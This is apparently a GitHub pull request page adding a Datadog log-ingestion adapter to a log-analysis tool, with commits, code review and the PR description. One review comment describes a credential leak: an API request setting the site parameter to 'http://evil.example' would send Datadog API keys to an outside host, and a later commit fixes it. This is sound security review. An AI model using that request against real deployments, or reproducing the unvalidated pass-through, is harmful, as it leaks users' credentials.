Repository navigation
feat: Datadog log adapter for ingestion - #32
Conversation
Operators can ingest a bounded Datadog window through the existing SourceAdapter pipeline instead of exporting files first. Events are mapped onto the JSON field aliases so core parsing stays source-agnostic. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
|
Bugbot is not enabled for your account, so this pull request was not reviewed. Enable Bugbot in the Cursor dashboard to get automatic reviews on future PRs. |
CI flake8 --select=F82 treats a quoted forward-ref return type as an undefined name. Drop the annotation so the helper matches the CloudWatch tests. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Drop the ADAPTER_ segment so keys match RAGLOGS_OPENAI_* rather than RAGLOGS_ADAPTER_DATADOG_*. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Code reviewClosest of the three adapter PRs to the CloudWatch pattern: env-only keys ( No ingest-correctness blockers. Mapping, absolute Suggestions
Env naming matches Merge note#31 / #33 will conflict on registry, CLI, API, README, and tests. Land this, then rebase those. |
| _int_param(spec.params, "page_size", self.page_size) | ||
| ) | ||
| max_rows = max(1, _int_param(spec.params, "max_rows", self.max_rows)) | ||
| site = spec.params.get("site") or self.site |
There was a problem hiding this comment.
Per-request site is reasonable for us3 / eu, but it feeds api_base_url() which currently accepts any origin. If you keep this override, validate it is a Datadog site hostname before storing it on the stream ref.
| if not site: | ||
| site = "datadoghq.com" | ||
| if site.startswith("https://") or site.startswith("http://"): | ||
| return site |
There was a problem hiding this comment.
Suggestion: a full http:// / https:// origin is passed through. Combined with discover() copying params.site (line 250) and _headers() attaching DD-API-KEY / DD-APPLICATION-KEY, POST /ingestions with "params": {"site": "http://evil.example"} exfiltrates credentials.
Restrict site to Datadog hostnames (datadoghq.com, us3.datadoghq.com, datadoghq.eu, …), not arbitrary URLs.
Settings now read DB_URL, DATADOG_API_KEY, OPENAI_API_KEY, and the rest without a project prefix, matching how .env files are typically written. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
api_base_url used to pass through arbitrary http(s) origins, so a params.site override could send API keys off-Datadog. Canonicalize to https://api.<known-site> and reject anything else at discover time. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Resolve conflicts from the RAGLOGS_ prefix removal (#34) while keeping Datadog env vars, docs, and adapter settings. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Keep both adapters in the registry, CLI, API, README, and unit tests so this PR can land after #32 without re-conflicting on shared files. Co-authored-by: Leonardo <leo-aa88@users.noreply.github.com>
Re-review (follow-up)The No remaining blockers. This is the cleanest of the three adapter PRs to land first. Suggestions (non-blocking)
Keeps |
Closes #1.
Adds a Datadog pull adapter so operators can ingest a bounded time window from the Logs Search API into the existing pipeline (normalize → fingerprint → Postgres) without exporting files.
How it works
DatadogSourceAdapterinsrc/adapters/datadog/implements the sameSourceAdaptercontract as CloudWatch (discover/read).raglogs ingest --adapter datadog --param query='service:api status:error' --since 1hPOST /ingestionswith"adapter": "datadog"(query defaults to*).DATADOG_API_KEY+DATADOG_APP_KEY(never CLI--param). Site, page size, and max rows are also configurable.timestamp,message,levelfromstatus,service,env,host,trace_id,request_id) so core parsing stays source-agnostic.Limits (documented in README /
.env.example)--resume-job.meta.page.after; absolutefrom/towindow (relative ranges drop events while paginating).ADAPTER_UNAVAILABLE(orpartial: trueif some events already landed).Config
All settings env vars dropped the
RAGLOGS_prefix (DB_URL,OPENAI_API_KEY,DATADOG_API_KEY, …).Tests
Unit tests mock the httpx boundary (pagination, resume cursor, max-rows cap, 429 retry vs 403, field mapping through
parse_json_line)./healthreports Datadog unavailable when keys are missing.